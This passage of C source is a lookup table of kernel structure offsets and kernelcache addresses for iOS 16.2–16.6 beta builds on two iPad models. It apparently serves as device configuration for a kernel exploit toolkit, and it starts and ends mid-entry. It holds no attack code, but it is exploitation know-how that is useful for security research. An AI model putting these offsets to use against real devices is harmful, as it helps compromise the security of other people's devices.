0xfffffff007f46780, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:52 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8101", .build_version = "20D47", .device_id = "iPad13,19", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3cd190, .kernelcache__gPhysBase = 0xfffffff0078401b0, .kernelcache__gPhysSize = 0xfffffff0078401b0 + 8, .kernelcache__gVirtBase = 0xfffffff00783e390, .kernelcache__perfmon_devices = 0xfffffff00a4083b0, .kernelcache__perfmon_dev_open = 0xfffffff007ef40f4, .kernelcache__ptov_table = 0xfffffff0077f33b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a407800, .kernelcache__vm_pages = 0xfffffff0077f00d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077f2368, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4077f8, .kernelcache__vn_kqfilter = 0xfffffff007f466a0, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:52 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8101", .build_version = "20D67", .device_id = "iPad13,19", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3cd190, .kernelcache__gPhysBase = 0xfffffff0078401b0, .kernelcache__gPhysSize = 0xfffffff0078401b0 + 8, .kernelcache__gVirtBase = 0xfffffff00783e390, .kernelcache__perfmon_devices = 0xfffffff00a4083b0, .kernelcache__perfmon_dev_open = 0xfffffff007ef40f4, .kernelcache__ptov_table = 0xfffffff0077f33b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a407800, .kernelcache__vm_pages = 0xfffffff0077f00d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077f2368, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4077f8, .kernelcache__vn_kqfilter = 0xfffffff007f466a0, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:59 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8101", .build_version = "20E246", .device_id = "iPad13,19", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a48d208, .kernelcache__gPhysBase = 0xfffffff00791ffc0, .kernelcache__gPhysSize = 0xfffffff00791ffc0 + 8, .kernelcache__gVirtBase = 0xfffffff00791e198, .kernelcache__perfmon_devices = 0xfffffff00a4cb520, .kernelcache__perfmon_dev_open = 0xfffffff007f0c64c, .kernelcache__ptov_table = 0xfffffff0078d3188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4ca990, .kernelcache__vm_pages = 0xfffffff0078cfeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078d2128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4ca988, .kernelcache__vn_kqfilter = 0xfffffff007f5b538, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:59 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8101", .build_version = "20E252", .device_id = "iPad13,19", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a48d208, .kernelcache__gPhysBase = 0xfffffff00791ffc0, .kernelcache__gPhysSize = 0xfffffff00791ffc0 + 8, .kernelcache__gVirtBase = 0xfffffff00791e198, .kernelcache__perfmon_devices = 0xfffffff00a4cb520, .kernelcache__perfmon_dev_open = 0xfffffff007f0c64c, .kernelcache__ptov_table = 0xfffffff0078d3188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4ca990, .kernelcache__vm_pages = 0xfffffff0078cfeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078d2128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4ca988, .kernelcache__vn_kqfilter = 0xfffffff007f5b538, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:08:42 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8101", .build_version = "20F66", .device_id = "iPad13,19", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a499288, .kernelcache__gPhysBase = 0xfffffff007920100, .kernelcache__gPhysSize = 0xfffffff007920100 + 8, .kernelcache__gVirtBase = 0xfffffff00791e2d8, .kernelcache__perfmon_devices = 0xfffffff00a4d7520, .kernelcache__perfmon_dev_open = 0xfffffff007f0c84c, .kernelcache__ptov_table = 0xfffffff0078d3188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4d6990, .kernelcache__vm_pages = 0xfffffff0078cfeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078d2128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4d6988, .kernelcache__vn_kqfilter = 0xfffffff007f5b9d0, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:36 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8101", .build_version = "20G5026e", .device_id = "iPad13,19", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a549ab0, .kernelcache__gPhysBase = 0xfffffff0079382a8, .kernelcache__gPhysSize = 0xfffffff0079382a8 + 8, .kernelcache__gVirtBase = 0xfffffff007936460, .kernelcache__perfmon_devices = 0xfffffff00a589550, .kernelcache__perfmon_dev_open = 0xfffffff007f3508c, .kernelcache__ptov_table = 0xfffffff0078eb9c8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a588910, .kernelcache__vm_pages = 0xfffffff0078e8108, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ea968, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a588908, .kernelcache__vn_kqfilter = 0xfffffff007f83be0, }, // iPad Pro 11 4th // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:34 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8112", .build_version = "20C65", .device_id = "iPad14,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a989190, .kernelcache__gPhysBase = 0xfffffe00079a80c8, .kernelcache__gPhysSize = 0xfffffe00079a80c8 + 8, .kernelcache__gVirtBase = 0xfffffe00079a62a8, .kernelcache__perfmon_devices = 0xfffffe000a9c43b0, .kernelcache__perfmon_dev_open = 0xfffffe00080bcdd0, .kernelcache__ptov_table = 0xfffffe00078f3370, .kernelcache__vm_first_phys_ppnum = 0xfffffe000a9c3800, .kernelcache__vm_pages = 0xfffffe00078f0098, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078f2330, .kernelcache__vm_page_array_ending_addr = 0xfffffe000a9c37f8, .kernelcache__vn_kqfilter = 0xfffffe000810cdf8, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:23:25 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8112", .build_version = "20D47", .device_id = "iPad14,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a99d190, .kernelcache__gPhysBase = 0xfffffe00079a81b0, .kernelcache__gPhysSize = 0xfffffe00079a81b0 + 8, .kernelcache__gVirtBase = 0xfffffe00079a6390, .kernelcache__perfmon_devices = 0xfffffe000a9d83b0, .kernelcache__perfmon_dev_open = 0xfffffe00080bcc60, .kernelcache__ptov_table = 0xfffffe00078f33b0, .kernelcache__vm_first_phys_ppnum = 0xfffffe000a9d7800, .kernelcache__vm_pages = 0xfffffe00078f00d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078f2370, .kernelcache__vm_page_array_ending_addr = 0xfffffe000a9d77f8, .kernelcache__vn_kqfilter = 0xfffffe000810cc88, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:23:25 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8112", .build_version = "20D67", .device_id = "iPad14,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 